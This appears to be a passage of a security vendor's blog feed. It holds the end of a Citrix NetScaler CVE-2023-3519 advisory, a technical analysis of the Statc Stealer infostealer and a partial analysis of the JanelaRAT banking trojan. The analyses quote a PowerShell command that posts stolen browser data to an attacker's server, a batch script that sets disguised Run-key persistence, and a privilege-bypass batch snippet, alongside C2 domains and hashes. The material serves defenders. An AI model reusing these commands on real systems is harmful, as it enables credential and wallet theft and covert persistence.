relevant updated versions as soon as possible. NetScaler ADC and NetScaler Gateway 13.1-49.13 and later releases NetScaler ADC and NetScaler Gateway 13.0-91.13  and later releases of 13.0  NetScaler ADC 13.1-FIPS 13.1-37.159 and later releases of 13.1-FIPS  NetScaler ADC 12.1-FIPS 12.1-55.297 and later releases of 12.1-FIPS  NetScaler ADC 12.1-NDcPP 12.1-55.297 and later releases of 12.1-NDcPP Zscaler Coverage Zscaler’s ThreatLabZ team has deployed protection. Zscaler Advanced Threat Protection: App.Exploit.CVE-2023-3519 Zscaler Private Access Protection: Remote Code Execution : 932100 (Remote Command Execution: Unix Command Injection basic coverage) Remote Code Execution : 932200 (RCE Bypass Technique) PHP Injection : 933100 (PHP Injection Attack: PHP Open Tag Found) We will update this article as information becomes available or if additional protection is put in place by Zscaler. Resources Citrix ADC and Citrix Gateway Security Bulletin for CVE-2023-3519, CVE-2023-3466, CVE-2023-346 Threat Actors Exploiting Citrix CVE-2023-3519 to Implant Webshells | CISA GitHub - BishopFox/CVE-2023-3519: RCE exploit for CVE-2023-3519 Hundreds of Citrix NetScaler ADC and Gateway Servers Hacked in Major Cyber Attack ( Tue, 08 ago 2023 19:59:10 -0700 Vishal Sangolekar Statc Stealer: Decoding the Elusive Malware Threat IntroductionRecently, while tracking global threat activity, the Zscaler ThreatLabz team discovered a new information stealer family called: Statc Stealer. Statc Stealer is a sophisticated malware that infects devices powered by Windows, gains access to computer systems, and steals sensitive information.In this comprehensive technical blog post, we unravel the intricate workings of Statc Stealer. By understanding its distribution methods and evasion techniques, we aim to equip you with the knowledge to secure your data against Statc Stealer. Key TakeawaysStealing Capabilities: Statc Stealer exhibits a broad range of stealing capabilities, making it a significant threat. It can steal sensitive information from various web browsers, including login data, cookies, web data, and preferences. Additionally, it targets cryptocurrency wallets, credentials, passwords, and even data from messaging apps like Telegram.Code and Evasion: The stealer utilizes C++ code, a common programming language for malware development. The stealer performs filename discrepancy checks to inhibit sandbox detection and reverse engineering analysis by researchers.Architecture and Ideal Target: Statc Stealer targets Windows operating systems and predominantly focuses on browsers used on Windows devices for stealing sensitive information.Encryption for Stealth: The malware leverages HTTPS encryption to hide its activities. Statc Stealer uses HTTPS protocol to send stolen, encrypted data to the command-and-control (C&C) server.Potential For HarmThe Zscaler ThreatLabz team recently discovered Statc Stealer. This malicious software gains access to a victim’s data by appearing like an authentic Google advertisement. Once the victim clicks on the advertisement, their operating system is infected with malicious code that steals sensitive data like credentials from web browsers, credit card information, and cryptocurrency wallet details. Unauthorized access to a victim’s computer system can have enormous personal and professional repercussions. Victims become easy targets for identity theft, cryptojacking, and other forms of malware attacks. At the enterprise level, a Statc Stealer breach can result in financial loss, reputational damage, legal liabilities, and regulatory penalties.Technical DetailsStatc Stealer gets started with an initial dropper. The initial dropper drops a decoy PDF installer and a downloader binary file. Then, the downloader binary file further downloads Statc Stealer using a PowerShell script. At a glance, both of these malicious files appear like legitimate software. However, once Statc Stealer is able to infect the victim’s device, it begins to steal data, encrypt it, and send it to its command-and-control (C&C) server. In addition, Statc Stealer utilizes evasion techniques to thwart attempts at reverse engineering the malware, making it harder to detect.Attack Chain Statc Stealer follows an attack chain that leverages malvertising to disseminate malicious files. The attack chain begins with an innocuous-looking advertisement within the victim's Google Chrome browser. Clicking on the malicious link results in downloading the Statc Stealer’s initial sample file, kicking off the malware infection. The attack chain operates as follows:A user is tricked into clicking on a malicious link somewhere on their Google Chrome browser (typically an advertisement).The user inadvertently downloads the Initial Sample file. After the malicious file executes, the Initial Sample drops and executes a Decoy PDF Installer. To facilitate the download of the Statc payload through a PowerShell script, the Initial Sample file also drops and executes a Downloader Binary file.Once Statc Stealer steals the user’s data, it encrypts the data, puts it in a text file, and stores it in the Temp folder.From here, Statc Stealer calls on its C&C server to deliver the stolen encrypted data.Figure 1: Statc Stealer attack chainInitial Sample URLThe URL below is malicious and shows where the initial sample is downloaded.95[.]217[.]5[.]87[/]Setup64_new0[/]Version2023-new[.]exe Payload URLThe URL below is malicious and shows the domain from where the Statc payload is downloaded.check[.]topgearmemory[.]comIn the screenshot below, the address bar contains the malicious URL. You can see how the Statc Stealer payload imitates an MP4 file format. The use of MP4 format to disguise malicious behavior lends Statc Stealer an innocent appearance, making it harder for traditional security measures to detect its true intent.Figure 2: Malicious URL used to download Statc Stealer payloadTechnical AnalysisEvasion using anti-analysis techniquesTypically, info stealers like Statc Stealer employ sophisticated techniques to avoid detection and persist on the victim’s machine.We found one anti-analysis technique while analyzing Statc Stealer:The sample looks for its original file nameChecks whether its file name is the same as its internal name Stops executing if it finds differencesEssentially, if Statc Stealer discovers that you’ve changed or updated its malicious files, then it stops in its tracks. The code example in the image below shows how:The sample used a FileName checkThe sample compares the file name with a hardcoded encrypted string Figure 3: File name comparison codeTheft and exfiltration of dataStealing activityStatc Stealer has a general information stealing capability. It’s able to take sensitive information from various browsers and wallets, and then store the data in a text file inside a Temp folder.Using the python script we mentioned above, we decrypted Statc Stealer’s encrypted strings.The image below shows various references to “wallets'' and “crypto”, indicating that sensitive cryptocurrency information has been compromised.Figure 4: Decrypted strings using python scriptEncrypted stringsFigure 5: Encrypted strings Decrypted stringsFigure 6: Decrypted stringsBrowser exfiltrationBrowser exfiltration is the unauthorized transfer of any data from a browser. It can involve social engineering, phishing attacks and emails, and even uploading data to an insecure hard drive. However, Statc Stealer uses its malicious software to drop and execute malicious files. Let’s explore how this works.How it worksStatc Stealer employs a straightforward and easily detectable technique to steal browser data. It leverages the Invoke-WebRequest Uniform Resource Identifier (URI) in PowerShell to initiate a process, using the following arguments:Invoke-WebRequest -Uri https[:]//topgearmemory[.]com/kdsfedafa/stat?c= -Method POST -InFile C:\Users\\AppData\Local\Temp\\41075.txt -UseDefaultCredentials -UseBasicParsing ; Remove-Item C:\Users\\AppData\Local\Temp\\41075.txtThe significance of Statc Stealer's exfiltration technique lies in its potential to steal sensitive browser data and send it securely to its C&C server. This allows the malware to harvest valuable information, such as login credentials and personal details, for malicious purposes like identity theft and financial fraud. Despite its simplicity, the technique aids security experts in detecting and analyzing the malware's behavior, enabling the development of effective countermeasures. Targeted browsersThe Statc Stealer malware can exfiltrate data from the following browsers:ChromeMicrosoft EdgeBraveOperaYandexMozilla FirefoxIt comes as no surprise that Statc Stealer, with its PE structure, strategically targets the most popular Windows browsers, By capitalizing on their widespread usage, this info stealer can cast a wider net, seeking to compromise sensitive data from a larger pool of unsuspecting users.Stealing autofill dataStatc Stealer is also capable of exfiltrating autofill data. If a stealer takes autofill data, login credentials, Personally Identifiable Information (PII) and payment information is at risk:Usernames and passwordsEmailCredit card detailsPersonal addressesPayment informationStolen data Figure 7: Stolen data in decrypted formData in encrypted formFigure 8: Stolen data after encryptionIn the images above, the Statc Stealer is exfiltrating browsers’ autofill information. From here, the malware will encrypt the stolen data and store it in a text file in the Temp folder.Process Monitor (ProcMon)Process Monitor (ProcMon) is an advanced monitoring tool for Windows that shows real-time file system, Registry and process/thread activity. It can help provide a snapshot into the types of sensitive information Statc Stealer is capable of stealing.Using ProcMon, we observed that Statc Stealer steals:user’s cookies dataweb datalocal state data preferences login datavarious different wallets informationFileZillabrowsers autofillsanydesk ronin_edgemeta mask Telegram dataWe captured this malicious activity in ProcMon in the image below.Figure 9: Browser related data shown in ProcMonWallet dataThe Statc Stealer can exfiltrate data from various wallets, like:Cryptocom-WalletPetra-aptos-walletexodus-web3-walletbitkeep-crypto-nft-walletliquality-walletethos-sui-walletsuite-sui-wallettallsman-polkadot-walletEnkrypt-ethereum-polkadotleap-cosmos-walletpontem-aptos-walletfewcha-move-walletrise-aptos-walletteleport-walletmartin-wallet-aptos-suiavana-wallet-solana-walletglow-solana-wallet-betasolflare-walletTransfer And Storage Of Stolen DataIn the case of Statc Stealer, cybercriminals are using a command-and-control (C&C) server network to move and store stolen data. A C&C server is a system controlled by the cybercriminals who distribute stealer malware to take sensitive data. The C&C server acts as their secure storage compartment where they send and store encrypted data for later use.The image below shows how Statc Stealer saves stolen data into text files and stores them in the Temp folder.Figure 10: Stolen data in Temp folder The image below shows how Statc Stealer tries to send the data (after it’s been encrypted) to its C&C server.Figure 11: Stolen data, in encrypted format, sent to C2Other Unusual ActivitySome malware may attempt to leverage less commonly monitored or analyzed registry locations to evade detection by security software. By choosing a relatively obscure location like this one, cybercriminals may hope to bypass certain detection mechanisms or security controls.Figure 12: Sample checking its presence in Shell Compatibility in RegistriesConclusionIn conclusion, the emergence of the new info stealer, Statc Stealer, highlights the relentless evolution of malicious software in the digital realm. Based on the observations made during analysis, we feel confident in saying that Statc Stealer:falls under the category of “info stealer” in malware typestargets users of Window's operating systemsis sophisticated and can perform various malicious activities if its able to gain access to your personal computer (Windows)targets sensitive information from web browsers and cryptocurrency walletsCybercriminals and their expanding list of malware types is becoming more complex by the minute. The discovery of Statc Stealer demonstrates the importance of staying alert, ongoing research, and monitoring. This in itself is a form of malware protection. However, we also recommend security teams inspect all traffic and leverage malware prevention engine like Zscaler Cloud Intrusion Prevention Systems (IPS) for known threats and sandboxing technology for unknown threats.In addition to staying on top of these threats, Zscaler's ThreatLabz team continuously monitors for new threats and shares its findings with the wider community.Zscaler CoverageZscaler sandbox coverageZscaler's multilayered cloud security platform detects indicators at various levels. During the investigation of this campaign, Zscaler Sandbox played a crucial role in analyzing the behavior of various files. Through this sandbox analysis, the threat scores and specific MITRE ATT&CK techniques triggered were identified, as illustrated in the screenshot provided below. This comprehensive approach empowers cybersecurity professionals with critical insights into the malware's behavior, enabling them to effectively detect and counter the threats posed by Statc Stealer.To learn more about coverage, visit the Zscaler Sandbox webpage or Win64.PWS.StatcSteale the Threat Library, where we list all threats and threat information.Figure 13: Zscaler sandbox coverageMITRE ATT&CK mapping MITRE ATT&CK mapping tableIDNameT1547Boot or Logon Autostart ExecutionT1217Browser Information DiscoveryT1059Command and Scripting InterpreterT1555Credentials from Password StoresT1132Data EncodingT1005Data from Local SystemT1001Data ObfuscationT1189Drive-by CompromiseIndicators of Compromise (IOCs) MD5 hash tableMD5 HASHDESCRIPTIONf77dc89afbaab53e5f63626e122db61eDropper3834ec03aee0860dfd781805cac3e649 Downloader65affc4e1d5242a9c3825ce51562d596 Statc Stealer (source VT)e002c90a035495631a0abf202720a79cStatc Stealer (source VT)f49348fa15d87e92896363b40267c9aeStatc Stealer (source VT) Domain and IP details tableDOMAIN/IPURLDESCRIPTION95[.]217[.]5[.]8795[.]217[.]5[.]87[/]Setup64_new0[/]Version2023-new[.]exeMALICIOUS URLcheck[.]topgearmemory[.]comcheck[.]topgearmemory[.]com/dw/9c890e1b2b4f2723a68fc905268ee010cae232be[.]txtMALICIOUS URLcheck[.]topgearmemory[.]comhttps[:]//topgearmemory[.]com/kdsfedafa/stat?c=BOTNET File namesVersion2023-new.exechtgpt_x64.exeSearchApplication.exesound_adapter.exe Tue, 08 ago 2023 11:59:42 -0700 Shivam Sharma JanelaRAT: Repurposed BX RAT Variant Targeting LATAM FinTech Introduction In June of 2023, our research team at Zscaler ThreatLabz discovered a threat actor targeting FinTech users in the LATAM region. JanelaRAT involves several tactics, techniques, and procedures (TTPs) such as DLL side-loading, dynamic C2 infrastructure, and a multi-stage attack. The final malware involved in this campaign is a heavily modified variant of BX RAT. Because of this, we named the malware: JanelaRAT. Key Takeaways Financial Data in LATAM: As of June 2023, JanelaRAT mainly targets financial and cryptocurrency data from LATAM bank and financial institutions. New, Nefarious Capabilities: JanelaRAT features a windows titles sensibility mechanism that allows the malware to capture window title data and send it to the threat attackers. Strategic and Exploitative Behavior: JanelaRAT employs a dynamic socket configuration system. The C2 infrastructure used by the threat attackers heavily abuses dynamic DNS services. Each domain is set up in the infrastructure to be active only on a certain day of the month. Evasive Maneuvers: JanelaRAT abuses DLL side-loading techniques from legitimate sources (like VMWare and Microsoft) to evade endpoint detection. Origin of Threat Actor: The developer of JanelaRAT is Portuguese-speaking. There is heavy use of Portuguese in the malware strings, metadata, decrypted strings, etc. Attack Chain This campaign involves a multi-stage infection chain with a moderate complexity level. The attack chain is kick started by a VBScript sent inside ZIP archives. (At the time of writing this blog, we do not know exactly how these ZIP archives were distributed to the users.) The VBScript performs two key actions: It fetches a ZIP archive from the attackers' server It drops a BAT file on the endpoint to prepare the system for the next stage of infection The ZIP archive contains two components which are responsible for carrying out the rest of the infection chain and accomplish DLL side-loading. The image below is a high-level view of the campaign’s attack chain. Figure 1: End-to-end attack chain of the campaign used to distribute JanelaRAT Technical Analysis VBScript Analysis For the purposes of technical analysis, we used this VBScript with MD5 hash: 24c6bff8ebfd532f91ebe06dc13637cb The code obfuscation in the VBScript is very primitive. After decoding all the strings in the VBScript, its purpose became evident to our team. The main operations performed by the VBScript are as follows: Drops a BAT file in the path: C:\Users\Public\ with a randomly generated 7-character alphanumeric name. Downloads content from the URL: hxxp://[.]com:3001/clientes/6 and parses it to extract a base64-encoded ZIP archive. Base64 decodes the content and saves the ZIP archive with a randomly generated 8-character alphanumeric file name. Executes the BAT file. Sleeps for 5 seconds and restarts the victim's machine. We observed that the URL used to download the base64-encoded ZIP archive was actually hosting 44 different variants of the archives, all stored base64-encoded. Since the URL was active at the time of our analysis, we were able to download all 44 variants of the ZIP archives. A Python script is included in the Appendix section of this blog to help you automate this process. The image below shows the web response when the URL is accessed directly without specifying the index. The response contains all 44 ZIP archives base64-encoded. Figure 2: Base64-encoded ZIP archives received in web response from attacker's server All these ZIP archives include components with different file hashes but similar functionality. This indicates that the main purpose of this method is evasion of file hash-based detection. Batch Script Analysis Batch script persistently triggers the JanelaRAT execution (via DLL side-loading) @echo off timeout /t 2 /nobreak >nul xcopy /q C:\Users\Public\Q3xk0o\VCRUNTIME140.dll C:\Users\willi\AppData\Roaming timeout /t 2 /nobreak >nul xcopy /q C:\Users\Public\Q3xk0o\opdrde.exe C:\Users\willi\AppData\Roaming timeout /t 2 /nobreak >nul timeout /t 2 /nobreak >nul ren C:\Users\willi\AppData\Roaming\opdrde.exe IWf2u49.exe timeout /t 2 /nobreak >nul reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MicrosoftEdgeAutoLaunch_ /d C:\Users\willi\AppData\Roaming\IWf2u49.exe /f set "pasta=C:\Users\Public\Q3xk0o" rmdir /s /q "%pasta%" The purpose of the batch script is to set up a persistent mechanism so the JanelaRAT sample is automatically launched at each system reboot. This is achieved by: Setting up a so-called RunKey. This allows a particular registry key hosting the path to a file and granting that file execution at reboot time. The batch script set the RunKey to the legitimate executable included in the second compressed archive. The execution of that file will cause the loading and execution of the JanelaRAT DLL. The key name (MicrosoftEdgeAutoLaunch_) was chosen so it can appear innocuous, like the legitimate RunKey for the Microsoft Edge browser. DLL side-loading JanelaRAT comes in the form of a DLL side-loaded by a legitimate executable. Depending on the legitimate executable employed in the attack, the DLL may have different names. We discovered these two: VCRUNTIME140.dll: side-loaded by vmnat.exe msedge_elf.dll: side-loaded by identity_helper.exe The legitimate executable, which is included in the compressed archive with JanelaRat, is usually renamed. In the table below, you can see metadata information of the JanelaRAT sample we used for technical analysis in this section Metadata information of the analyzed JanelaRAT instance Name VCRUNTIME140.dll MD5 c18edb805748b4bd5013ccb47f061c2a SHA1 37df375be813d91e11795a75872479c1a656e951 SHA256 0c873439bc0af08fdf0c335c5a94752413fd096c0c2f1138f17e786bc5ce59c3 The DLL was developed in C# for Microsoft .NET 4.0 and the source code is protected by Eazobfuscator - a commercial code obfuscator for .NET assemblies. The image below shows the assembly metadata containing clear-text strings in Portuguese, supporting our hypothesis about the threat attacker's intention to make JanelaRAT seem like a real cybersecurity tool. For instance: "Firewall de Rede" means network firewall "Plataforma de Segurança Mulitcanal" means multichannel security platform "Ferramenta de Segurança Inteligente" means smart security tool "Análise de Segurança de Banco de Dados" means database security analysis At a glance, these seemingly legitimate security strings can make JanelaRAT appear like a real cybersecurity tool. Figure 3: JanelaRAT impersonating as a cybersecurity tool using well-crafted metadata Self-Defense Mechanisms String encryption Most of the JanelaRAT strings are encrypted and stored in a dedicated class as a form of anti-analysis. Each field of this class contains either an encrypted string or an array of encrypted strings. The string decryption algorithm can be broken down in the following steps: The encrypted string is decoded using base64. Once decoded, the string is decrypted. The decryption algorithm is Rijndael AES in Cipher Block Chaining (CBC) mode. The decryption key is always the same for all the strings and, to the best of our knowledge, it is the same across the samples: the MD5 of the string 8521. The Initialization Vector (IV) varies for each string, being set to the first 16 bytes of the string decoded in the point above. The decryption is only applied to the remaining bytes. We provide a Python implementation of this algorithm in the Appendix section of this blog. Idle if inactive JanelaRAT utilizes a basic self-protection mechanism to mitigate the risk of being detected. Every 5 seconds the malware checks the time elapsed from the system start to the last input event that occurred on the infected system. If this time span exceeds 10 minutes then the malware transitions into an idle state. While in the idle state, JanelaRAT stays silent by not exposing any unnecessarily risky behavior that might arouse suspicion. The image below shows the method used to perform the inactivity check. The method call is a wrapper around the GetLastInputInfo native API, responsible for instantiating a LASTINPUTINFO data structure. The dwTime field of such a structure contains the milliseconds elapsed since the last input event. The method returns true if the amount of time passed from the system start (Environment.TickCount), to the last input received (dwTime), exceeds 10 minutesFigure 4: JanelaRAT checks if the infected system has been inactive (no input events) for more than 10 minutes In the image below, you can see that: if the check returns true, the malware sets its internal state to "Idle" if the check returns false, the malware sets its internal state to "Active" The state transition, regardless if true or false, is communicated to the threat attacker through the C2. You can see this in action in the image below. Figure 5: JanelaRAT communicating state transition to threat actors using C2 Network and Communication C2 check-in Once it gets started, JanelaRAT makes a request to register the newly-infected host to the threat attacker’s network. The C2 domain is always the same: cnt-blackrock.geekgalaxy[.]com The HTTP verb is GET The User-Agent is hardcoded and rather peculiar: VisaoAPP The image below shows that the GET request consists of four parameters. Figure 6: JanelaRAT checks-in to the attacker's network of compromised hosts JanelaRAT's request parameters to join attacker's network Parameter Description op Quadruple (OS major, OS minor, OS architecture code, OS integer pointers size). The quadruple is provided as a pipe-separated (“|”) string. Example: 0|4|2|32 us Role of the user logged in at the time of request. Supported values: Admin, User, Convidado (Guest in Portuguese), and Desconhecido (Unknown in Portuguese). nm Machine name vs Malware version string, e.g. The malware makes this request attempt only if it doesn’t find a file named fi.ini in the temporary files directory. Any response from the server isn't handled. C2 rotation and communication The JanelaRAT configuration contains 32 domains used for C2 communication. Those domains are encrypted with the algorithm described earlier in the String Encryption section. The selection in that array is guided by the day of the month when making the request. For example, the following table shows the domain array for all the JanelaRAT samples we analyzed. JanelaRAT C2 domains 0 aigodmoney009[.]access[.]ly 11 myfunbmdablo99[.]hosthampster[.]com 22 minfintymexbr[.]geekgalaxy[.]com 1 freelascdmx979[.]couchpotatofries[.]org 12 irocketxmtm[.]hopto[.]me 23 cinfintymex[.]geekgalaxy[.]com 2 439mdxmex[.]damnserver[.]com 13 hotdiamond777[.]loginto[.]me 24 9mdxmex[.]damnserver[.]com 3 897midasgold[.]ddns[.]me 14 imrpc7987bm[.]mmafan[.]biz 25 ikmidasgold[.]ddns[.]me 4 disrupmoney979[.]ditchyourip[.]com 15 dmrpc77bm[.]myactivedirectory[.]com 26 rexsrupmoney979[.]ditchyourip[.]com 5 kakarotomx[.]dnsfor[.]me 16 jxjmrpc797bm[.]mydissent[.]net 27 kktkarotomx[.]dnsfor[.]me 6 skigoldmex[.]dvrcam[.]info 17 askmrpc747bm[.]mymediapc[.]net 28 megaskigoldmex[.]dvrcam[.]info 7 i89bydzi[.]dynns[.]com 18 myinfintyme09[.]geekgalaxy[.]com 29 izt89bydzi[.]dynns[.]com 8 infintymexbrock[.]geekgalaxy[.]com 19 infintymex747[.]geekgalaxy[.]com 30 zeedinfintymexbrock[.]geekgalaxy[.]com 9 brockmex57[.]golffan[.]us 20 infintymexb[.]geekgalaxy[.]com 31 zeedinfintymexbrock[.]geekgalaxy[.]com 10 j1d3c3mex[.]homesecuritypc[.]com 21 jinfintymexbr[.]geekgalaxy[.]com As you may notice, there is an extra domain at index 0 that will never be used by the C2 domain rotation algorithm. Furthermore, the domains for day 30 and day 31 are the same. The C2 channel is implemented as a socket opened to the resolution IP of the daily C2 domain. The socket port is obtained by making a request for a text file named 16Psyche.txt. This file contains just the port, encrypted with the algorithm discussed in the String Encryption section. JanelaRAT implements a custom protocol to communicate with the C2. This protocol is defined by a hierarchy of classes representing the type of messages expected to be exchanged between the malware samples and the C2 server. We call those messages "packets" because this feature was imported from BX RAT, where all those classes implement the same interface called "packet". We found packets for: mouse inputs keyboard inputs screenshot captures and more When any of those packets is instantiated to be shipped through the C2 channel, the instance is: serialized into an array of integers encrypted with a custom implementation of RC4 with key 8521 compressed with a custom implementation of the LZ4 algorithm eventually sent through the C2 channel The image below shows an example a packet class representing a sequence of keystrokes sent by the threat attacker to the malware so that they can be sent to the targeted window. This class defines specific fields (e.g., the string containing the keystrokes) with a method responsible for implementing the communication procedure. Figure 7: Example of packet class used by JanelaRAT to implement its C2 communication procedure Capabilities Capture and check window data JanelaRAT captures the content of windows title bars and checks if they are interesting for the threat attacker. "Interesting" titles will be related to financial and banking data. The malware implements a periodic behavior triggered every second and consists of three consecutive stages. Stage 1 At the first stage, JanelaRAT checks if it obtained a list of interesting title bars. If not, then the malware requests a text file named kepler186f.txt to the C2. The content is encrypted with the same algorithm used for the strings. (Since the campaign was still active at the time of analysis, we were able to download an instance of such a file.) Once decrypted, you can see that it consists of a pipe-separated ("|") list of capitalized windows titles. You can see an excerpt of the decrypted content in the box below. Excerpt from an instance of kepler186f.txt BANCOAZTECATUBANCAENLNEASUEASDECIDESLOGRAS|BITCOIN|SOLANA|ACTINVER|ACCESOALSISTEMABURSANET|ACTINVERBANCO| ACCESOCONSULTADESALDOS|EACTINVER|ACCESOABANCABANCOAZTECA|BIENVENIDOSALABANCAENLNEABBVAMXICO|EMPRESASYG OBIERNOEMPRESASBBVAMXICO|INDEXBBVANET|BBVANETCASH|SANTANDERMXICOSPARTEDELABANCAELECTRNICA|BITCOIN|BTC|RIPP LE|ETHEREUM|CASADEVECTOR|SANTANDER|SANTANDERM|ENLACESANTANDERCOMMXLOGBETENSCHANNELDRIVERSSOBTODSEOPE RATIONNAMELOGINDSENEXTEVENTNAMESTARTDSEPROCESSORSTATEINITIALNOWCHECKINGCOOKIES|BANCOSANTANDERS|BBCOMM XWEBCENTERPORTALBANBAJIOHOME|ELBANCODECONFIANZAPARAPERSONASPYMESGOBIERNOYAGRONEGOCIOS|BANCAPORINTERN ETBBCOMMX| … [REDACTED] Kepler186f.txt file content is parsed as an array of strings and stored as a class field for future use. Stage 2 At the second stage, JanelaRAT checks the same DLL directory for the block.blq file. This file has a slightly different structure compared to the kepler186f.txt file. It is still composed of a single, pipe-separated, record but it only contains three fields: a timestamp, a base64-encoded image a list of dash-separated ("-") window titles The image below shows a snippet, belonging to the malware code, implementing the parsing logic for block.blq. If the file is outdated, then the malware deletes it. Figure 8: JanelaRAT code snippet implementing the parser for block.blq file content The window titles included as the third field in block.blq are titles of windows the attacker wants to block. When the title of the foreground window is included in the block.blq, the malware attempts to close it. The blocking mechanism is implemented by invoking the SendMessage API with WM_CLOSE value for the Msg argument. JanelaRat also visualizes a dialog to the victim showing a fake error message. Stage 3 At the third stage, the malware checks if the title of the window in the foreground is appealing. The check is made after grabbing the title, capitalizing it, and eventually dropping all non-alphabetical characters. By "appealing", we mean what was discussed at Stage 1 (i.e., the title was in a previously parsed instance of kepler186f.txt). If the check succeeds, JanelaRAT opens a C2 channel in the form of a socket as discussed earlier. This channel is later used for alerting the threat attacker about the victim opening interesting windows, sending key logs, mouse clicks, and implementing remote desktop sessions. Acquire host profile details JanelaRAT is capable of collecting and sending information about the compromised host to the attacker. This information is encapsulated in a packet containing the fields reported in the following table. As you can see, the field names don't always correlate with their actual content. Moreover, some fields are left to the default values. Those aspects suggest that the original malware source code has been eventually modified or repurposed to fit the new needs of the operator. JanelaRAT sends basic information about the compromised host to the attacker Field Name Field Value Version JanelaRAT version string. Hardcoded as for the sample discussed in this section. One of the few unencrypted strings embedded in the malware. OperatingSystem A pipe-separated string containing the following fields: OS version major, OS version minor, OS platform, integer pointers size. Example: 0|4|2|32. AccountType A dash-separated string containing the following fields: Role of the user logged in at time of request. Supported values: Admin, User, Convidado (Guest in Portuguese), and Desconhecido (Unknown in Portuguese). Country A string containing the title of the last “interesting” window opened by the user. For interesting, we mean that is included in the content of the kepler186f.txt file (previously discussed). All non-alphabetical symbols are removed from the original title bar and the chars are upper-cased. CountryCode Empty string. Region Empty string. City Empty string. ImageIndex 0 Track mouse movements JanelaRAT is capable of sending mouse activity to through C2. It defines a packet class containing the following fields: x-position of the cursor y-position of the cursor a boolean value set to true if the left button of the mouse is clicked a boolean value set to true if the left button of the mouse was double clicked Once serialized, an instance of this class is shipped. Track system usage JanelaRAT is capable of gathering additional information about the infected system usage. System usage information gathered by JanelaRAT Index Element 0 User 1 [username of the user currently logged in] 2 PC 3 [machine name] 4 Ligado [connected in Portuguese, ed.] 5 [time elapsed since the last system reboot. It’s a string having the format {0}d : {1}h : {2}m : {3}s where {0}, {1}, {2}, {3} are placeholders for the number of days, hours, minutes, and seconds respectively] 6 IP 7 [comma-separated list of IP addresses currently associated with the infected system] The malware assembles an array of strings containing the elements shown in the table above. Once assembled, the array is sent to the C2. Open message boxes on the infected system JanelaRAT gives a threat attacker the ability to open message boxes on the infected system, which may influence the behaviour of the user. After having shown the message box, the malware sends an acknowledgment to the C2. The acknowledge is another packet class containing a single field of type string called "Message" and instantiated with the value Mensagem mostrada ("Message shown" in Portuguese). Perform actions JanelaRAT is capable of performing a wide range of actions on the attacker’s behalf. Those actions are identified by an integer number called "Mode". JanelaRAT is capable of performing action on behalf of the attacker Mode Description 1 Shuts down the infected system by issuing the shutdown shell command. 2 Suspends the infected system. 5 Enables mouse synthesization. This mode allows the attacker to simulate the mouse and issue clicks or double-clicks for the left button. 6 Enables sleep for one second. 8 Enables sleep for one second. 9 Create a file named 1.bat under the user directory. That file contains the following batch script: cmd /min /C set __COMPAT_LAYER=RUNASINVOKER && start #1 cmd /min /C REG ADD HKCUControl PanelDesktop /v Win8DpiScaling /t REG_DWORD /d 0x00000001 /f cmd /min /C REG ADD HKCUControl PanelDesktop /v LogPixels /t REG_DWORD /d 0x00000060 /f The purpose of this script is to fix potential errors in rendering fonts. This script is executed with %SystemRoot%\taskmgr.exe as its first argument, resulting in executing the Task Manager application without requesting administrative privileges. The task Manager window is immediately hidden by running ShowWindow API with the SW_HIDE value for the nCmdShow argument. Finally, 1.bat is removed. 10 Deletes the file block.blq if it exists in the same folder as JanelaRAT. 11 Sends a test email by starting a new process with mailto:[email protected]?subject=teste&body=teste 12 Enables Desktop Windows Manager composition and sets the Aero Windows theme. 51 Disables mouse synthesization. 52 Shows the last selected window, waits 300 milliseconds, and eventually maximizes it. 80 Sends the {DOWN} key to the currently active application. 81 Sends the {UP} key to the currently active application. 82 Sends the {TAB} key to the currently active application. 99 Uninstalls any hook installed by JanelaRAT to monitor keyboard events and mouse events. In this specific case, there is no acknowledgement sent back to the attacker when the operation completes. After an action is performed, with the exception of Mode 99, the malware sends a notification to the C2 by encapsulating Mode as the field of a packet class and shipping the serialized instance. Capture screenshots JanelaRAT is capable of capturing and shipping screenshots. It defines an packet class containing three fields: Janela (window, in Portuguese): Integer dictating the type of screenshot operation being requested. If Janela is set to 1, the malware captures a magnified screenshot. If Janela is set to 2, then the malware live-captures a screenshot and sends it through the C2. Mode: Integer that controls the encoding of the captured screenshot. If this field is set to a value bigger than 10, then the screenshot is encoded as a PNG, otherwise it is encoded as a JPG. Number: This field is not used. Run in special execution modes JanelaRat ships with the capability of running in special execution modes. Each execution mode affects the malware behaviour and it is identified by a label. The attacker may request the malware to operate in any of those modes. As an example, when in _blcoqueio_tempo_determinado mode, the malware creates a new block.blq file with a limited duration in minutes. The purpose of this behaviour is to temporarily prevent the user from opening windows with specific titles. The file is created only if it doesn’t already exist in the malware directory. When in _modal_inicial mode, the malware shows a modal dialog that forces the user to interact with the malware by disabling user interaction with the main window. The foreground image for the dialog is obtained from C2. The malware registers a hook for both keyboard and mouse events. When in _modal_win_update mode, JanelaRAT displays a fake alert warning the user to not shut the system down while the Windows updates are in progress. Most likely, this allows the attacker to operate on the compromised host while the fake warning is shown to the user. Finally, when in _modal_loading, modal_error, or modal_tocalm, JanelaRAT operates in the same way: it shows an attacker-provided image to the user. The image is different in each mode, but we weren't able to obtain any of those at the time of analysis. Relationship with BX RAT BX RAT is a malware discovered in 2014 and is a fully-fledged Remote Access Trojan (RAT). BX RAT is capable of: shell command execution file download/upload directory exploration processes enumeration and killing process creation system information gathering remote desktop control and more Figure 9: BX RAT event handlers - which indicate functionalities Similarities between BX RAT and JanelaRAT The threat attackers who created JanelaRAT took strong inspiration from the BX RAT code. In this section, we discuss similarities between BX RAT and JanelaRAT. For BX RAT, we use an unpacked sample in circulation since 2014. The hashes are listed below: Hashes of the BX RAT instance used to compare it with JanelaRAT MD5 7e4592e02951be844a2ee603d75070a6 SHA1 be7e5282efe58018b462a5ba0a78a7f01108460d SHA256 c6b3f1648f7137df91606f6aaaa6d25d672e18c8adcb178c6d8cdcf3148a3c81 C2 communication procedure We believe the JanelaRAT developer imported the C2 communication procedure from BX RAT. As shown in the image below, BX RAT serializes a packet instance as an array of integers. This array is later encrypted and finally compressed with a custom implementation of the LZ4 algorithm. The same we observed in JanelaRAT. The encryption algorithm, at least in this BX RAT sample, is a different one since it consists of a custom implementation of AES instead of RC4 - like in JanelaRAT. Regardless, the two images below show the similarity between the BX RAT C2 transmission procedure (top) and the corresponding code in JanelaRAT (bottom). Figure 10: BX RAT serializes a packet instance as an array of integers Figure 11: JanelaRAT serializes a packet instance as an array of integers LZ4 Algorithm The custom implementation of the LZ4 algorithm is the same in BX RAT (top image) and JanelaRAT (bottom image). Figure 12: Excerpt of BX RAT custom implementation of LZ4 compression algorithm Figure 13: 